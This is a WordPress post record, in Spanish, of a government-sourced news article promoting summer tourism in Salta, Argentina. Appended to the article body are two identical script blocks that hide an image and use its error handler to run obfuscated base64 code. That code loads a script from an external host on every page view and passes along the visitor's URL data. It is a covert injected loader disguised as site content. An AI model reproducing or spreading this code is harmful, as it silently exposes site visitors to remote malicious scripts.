{"id":4767,"date":"2025-01-27T16:31:34","date_gmt":"2025-01-27T19:31:34","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4767"},"modified":"2025-08-13T23:41:59","modified_gmt":"2025-08-14T02:41:59","slug":"salta-refuerza-su-oferta-turistica-para-el-verano","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4767","title":{"rendered":"Salta refuerza su oferta tur\u00edstica para el verano"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-46c946791b1269be16f789a33ee6138a\" style=\"background-color:#066095\"><em>En un contexto complejo, Salta emerge como una respuesta que combina autenticidad, diversidad y accesibilidad. La provincia invita a los turistas a vivir un verano lleno de aventuras, descanso y experiencias, reafirmando su lugar como uno de los destinos m\u00e1s elegidos de Argentina. Toda la oferta puede encontrarse en www.visitsalta.ar<\/em><\/h5>\n\n\n\n<p>Salta enfrenta la coyuntura con una receta que la ha distinguido en las \u00faltimas d\u00e9cadas y que ha dado resultados de crecimiento y diferenciales: la sinergia entre los sectores p\u00fablico y privado no solo es una mec\u00e1nica recurrente, en estos momentos es una necesidad, acompa\u00f1ada de acciones y estrategias espec\u00edficas; y una decisi\u00f3n pol\u00edtica en la nueva gesti\u00f3n. Frente al desaf\u00edo que esto implica, Salta intensifica sus estrategias promocionales y contin\u00faa consolid\u00e1ndose como uno de los destinos m\u00e1s completos del pa\u00eds, destac\u00e1ndose por su variada oferta tur\u00edstica, eventos culturales y actividades al aire libre que convocan a turistas nacionales e internacionales, cabe mencionar que la provincia es un destino con m\u00e1s de 25.600 plazas, y que la oferta de alojamientos no ha parado de crecer (20% m\u00e1s que en 2019).<\/p>\n\n\n\n<p>Salta es un destino muy competitivo y en lo que va del verano, los festivales y ferias han sido protagonistas, invitando a salte\u00f1os y turistas de todo el pa\u00eds a disfrutar de una experiencia \u00fanica, esto ha potenciado el impacto econ\u00f3mico positivo en cada uno de los municipios que pusieron \u00e9nfasis en su realizaci\u00f3n, con fuerte afluencia de visitantes, que disfrutaron en cada punto de la Provincia, de la oferta propuesta. El Festival Nacional del Poncho, Doma y Folklore en Molinos, el Seclante\u00f1o y la Feria Artesanal de los Valles Calchaqu\u00edes en San Carlos, entre otros, han reunido a miles de visitantes, fortaleciendo la econom\u00eda regional y las tradiciones culturales; consolidando cada evento como un motor de crecimiento y oportunidades.<a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15795-salta-refuerza-su-oferta-turistica-para-el-verano.webp\"><\/a><\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15795-salta-refuerza-su-oferta-turistica-para-el-verano.webp\" alt=\"Salta refuerza su oferta tur\u00edstica para el verano.\" style=\"width:348px;height:auto\"\/><\/figure><\/div>\n\n\n<p>Adem\u00e1s, los \u00edconos tur\u00edsticos de la provincia, como el Tren a las Nubes y el renovado Telef\u00e9rico, que incorpor\u00f3 el tramo Aladelta, contin\u00faan atrayendo la atenci\u00f3n. El telef\u00e9rico ahora suma un producto para el turismo aventura con su recorrido hacia el Aladelta, incrementando exponencialmente la demanda, mientras que el Tren a las Nubes, mantiene su ocupaci\u00f3n con turistas de provincias como Buenos Aires, C\u00f3rdoba y Santa Fe, y visitantes internacionales liderados por Brasil, Italia y Espa\u00f1a. Entre ambos productos favoritos para quienes eligen la Provincia, m\u00e1s de 26 mil turistas han disfrutado de las experiencias que cada uno ofrece, marcando nuevamente que el sostenimiento de esta oferta es esencial para Salta.<\/p>\n\n\n\n<p>Los parques urbanos, como el del Bicentenario y el Parque Acu\u00e1tico El Pr\u00e9stamo, ofrecen alternativas recreativas para quienes buscan disfrutar de la naturaleza, destac\u00e1ndose actividades como el avistaje de aves y propuestas guiadas de recreaci\u00f3n y el disfrute de actividades acu\u00e1ticas. En lo que va de la temporada, se registran cifras r\u00e9cord de afluencia, marcando con esto, que las estrategias de potenciaci\u00f3n y promoci\u00f3n de estos espacios est\u00e1n dando sus frutos.<\/p>\n\n\n\n<p>En el \u00e1mbito de la promoci\u00f3n, Salta ha redoblado esfuerzos con su presencia en destinos estrat\u00e9gicos como Provincia de Buenos Aires y C\u00f3rdoba. Acciones de street marketing, activaciones tem\u00e1ticas y distintas intervenciones, destacan la riqueza cultural y gastron\u00f3mica de la provincia. En Pinamar, el Paseo del Norte Grande, espacio compartido con otras provincias del norte argentino, se ha convertido en un escenario clave para mostrar lo mejor de Salta.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15796-salta-refuerza-su-oferta-turistica-para-el-verano.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15796-salta-refuerza-su-oferta-turistica-para-el-verano.webp\" alt=\"Salta refuerza su oferta tur\u00edstica para el verano.\" style=\"width:366px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>La pronta inauguraci\u00f3n de la ruta a\u00e9rea que conecta Salta con Asunci\u00f3n, Paraguay, marca un hito clave en la conectividad de la provincia, consolid\u00e1ndola como un eje estrat\u00e9gico en el norte argentino. Esta nueva conexi\u00f3n internacional no solo facilita el intercambio tur\u00edstico y cultural con un mercado prioritario para Salta, sino que tambi\u00e9n impulsa las relaciones comerciales y econ\u00f3micas entre ambas regiones. Adem\u00e1s, refuerza el posicionamiento de Salta como un hub a\u00e9reo clave, que ya cuenta con conexiones directas a otros destinos nacionales e internacionales, promoviendo el desarrollo de la industria tur\u00edstica y potenciando el impacto positivo en la econom\u00eda local y regional, y que contribuir\u00e1 a la afluencia de visitantes durante los pr\u00f3ximos meses.<\/p>\n\n\n\n<p>Adem\u00e1s, la Provincia tuvo una destacada presencia en FITUR 2025, una de las ferias de turismo m\u00e1s importantes del mundo, llevada a cabo en Madrid, con el objetivo de atraer m\u00e1s turistas europeos y consolidarse como destino l\u00edder en el mercado global. Representada por autoridades como la ministra de Turismo y Deportes, Manuela Arancibia, y en alianza con operadores nacionales e internacionales a trav\u00e9s del programa Aliados Estrat\u00e9gicos, Salta busca fortalecer su proyecci\u00f3n internacional y fomentar la comercializaci\u00f3n del destino. Europa representa el 28% de los visitantes extranjeros que recibe la provincia, con especial inter\u00e9s del mercado espa\u00f1ol por experiencias culturales, gastron\u00f3micas y de naturaleza. La participaci\u00f3n en este evento estrat\u00e9gico refuerza su visibilidad global y el desarrollo de alianzas clave para el turismo.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15797-salta-refuerza-su-oferta-turistica-para-el-verano.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15797-salta-refuerza-su-oferta-turistica-para-el-verano.webp\" alt=\"Salta refuerza su oferta tur\u00edstica para el verano.\" style=\"width:335px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>La ministra de Turismo y Deportes,&nbsp;<strong>Manuela Arancibia<\/strong>, destac\u00f3: \u201cEl turismo no solo es clave para nuestra econom\u00eda, sino tambi\u00e9n para reforzar nuestra identidad cultural. Salta enamora, y estamos trabajando, y redoblando esfuerzos para que m\u00e1s visitantes lo descubran.\u201d<\/p>\n\n\n\n<p>Las campa\u00f1as \u201cUn amor de verano\u2026 de esos que duran para siempre\u201d y \u201cEste verano disfrut\u00e1 Salta\u201d se encuentran activas en m\u00faltiples plataformas para seguir posicionando a la provincia como un destino \u00fanico. Y se reforzar\u00e1n con acciones concretas en destinos de cercan\u00eda. Durante las pr\u00f3ximas semanas se planifican acciones y presencias en provincias vecinas y diferentes activaciones, para continuar posicionando a Salta como el destino favorito en el Norte.<\/p>\n\n\n\n<p>Con todas estas acciones, y m\u00e1s de 2500 actividades propuestas en el calendario de Verano, Salta se afirma como un destino que combina paisajes inigualables, cultura, tradici\u00f3n y la calidez de su gente, ofreciendo experiencias inolvidables para todos los gustos.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En un contexto complejo, Salta emerge como una respuesta que combina autenticidad, diversidad y accesibilidad. La provincia invita a los turistas a vivir un verano lleno de aventuras, descanso y experiencias, reafirmando su lugar como uno de los destinos m\u00e1s elegidos de Argentina. Toda la oferta puede encontrarse en www.visitsalta.ar Salta enfrenta la coyuntura con [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4768,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11,4,18],"tags":[],"class_list":{"0":"post-4767","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles","8":"category-paisajes","9":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4767"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4767"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4767\/revisions"}],"predecessor-version":[{"id":6589,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4767\/revisions\/6589"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4768"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4767"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4767"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4767"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}